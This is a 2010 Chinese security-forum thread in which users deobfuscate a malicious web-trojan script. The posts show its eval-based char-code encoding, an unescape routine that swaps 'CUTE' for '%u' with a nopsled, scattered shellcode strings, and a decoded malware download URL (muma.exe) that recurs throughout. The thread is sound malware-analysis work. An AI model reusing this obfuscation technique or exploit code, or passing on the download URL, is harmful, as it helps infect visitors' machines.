123   1  /  3  页   跳转

[求助] 这个网马怎么解密?

这个网马怎么解密?

RT,请各位大大帮忙,告诉我方法,是什么加密的
题目见16楼
最后编辑微米天空 最后编辑于 2010-02-09 20:04:44
分享到:
gototop
 

回复:这个网马怎么解密?

好像是eval加密吧  但是我还是没解出网马哦
多抽出一分钟时间回帖,让你的卡卡生活更加精彩~
SREng工具http://bbs.ikaka.com/showtopic-8442813.aspx
gototop
 

回复:这个网马怎么解密?

http://www.13the.cn/blackhole/muma.exe
gototop
 

回复: 这个网马怎么解密?



引用:
var sss = Array(590,485,570,160,495,585,580,505,565,565,160,305,160,585,550,505,575,495,485,560,505,200,560,485,605,540,555,485,500,230,570,505,560,540,485,495,505,200,235,335,425,420,345,235,515,320,160,170,185,585,170,205,205,295,160,550,555,560,575,540,505,500,160,305,160,585,550,505,575,495,485,560,505,200,170,185,585,240,485,240,485,185,585,240,485,240,485,170,205,295);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){
arr = String.fromCharCode(sss/5); } var cc=arr.toString();cc=cc.replace(/,/g, "");
cc = cc.replace(/@/g, ",");
eval(cc);
首先观察代码

此处的EVAL可以运行解密出来
得到
nullvar cuteqq = unescape(payload.replace(/CUTE/g, "%u")); nopsled = unescape("%u0a0a%u0a0a");
意思是上述代码中CUTE就是%u所以替换CUTE然后解密就OK了

注意下,shellcode需要按照顺序排列否则解密出来不能看
gototop
 

回复:这个网马怎么解密?

http://www.13the.cn/blackhole/muma.exe
哇!开了眼界了  很牛的加密方法啊
1、替换eavl(),在代码中可以看到unescape(payload.replace(/CUTE/g, "%u"))的代码,其中就告诉了我们要把CUTE字符串改成%u,这个正是解密方法的精髓。
2、用%u代替CUTE,用两次ESC转换得到http://www.1CUTE7433he.cn/blCUTE6361khole/CUTE756dma.exe(这仍然不是最后的网马地址)
3、注意其中还有CUTE字符串,继续替换为%u,再来两次ESC,才能最后得到网马地址:http://www.13the.cn/blackhole/muma.exe

做网马的人真是太狡猾了!!!
最后编辑暗夜的雪 最后编辑于 2010-02-09 13:48:57
娱乐致死还是娱乐至死啊?
gototop
 

回复 5F 暗夜的雪 的帖子

其实不解密那代码也一样,经验多了看一眼就知道了
gototop
 

回复 4F ty88 的帖子

按照顺序排列是什么意思呢?我解密出来很乱的

a10="UTED0FFjWW?W钀http:/"w;
a11="fww.13the.cn/blCU";
a12="TE6361khole/CU";
payload =a1+a2+a3+a4+a5+a6+a7+a8+a9+a10+a11+a12+"TE756dma.exe";


gototop
 

回复 7F 微米天空 的帖子

明白了 原来还要再替换解密啊·~
gototop
 

回复 5F 暗夜的雪 的帖子

不错,厉害啊你!
gototop
 

回复:这个网马怎么解密?

关于:解密的日志(全体输出 -  1):

Level  1>http://www.13the.cn/blackhole/muma.exe

日志由 Redoce2.0第70次修正版于 2010-2-9 13:56:27 生成。

payload = a1+a2+a3+a4+a5+a6+a7+a8+a9+a10+a11+a12+"TE756dCUTE616"+"dCUTE652eCUTE6578"+""+""+""+""+"";


另外那个替换%u的,如4楼所说
代码中有一段这样代码,你把a1到a12的全加起来,再加后面的那些,清楚引号和加号
gototop
 
123   1  /  3  页   跳转
页面顶部
Powered by Discuz!NT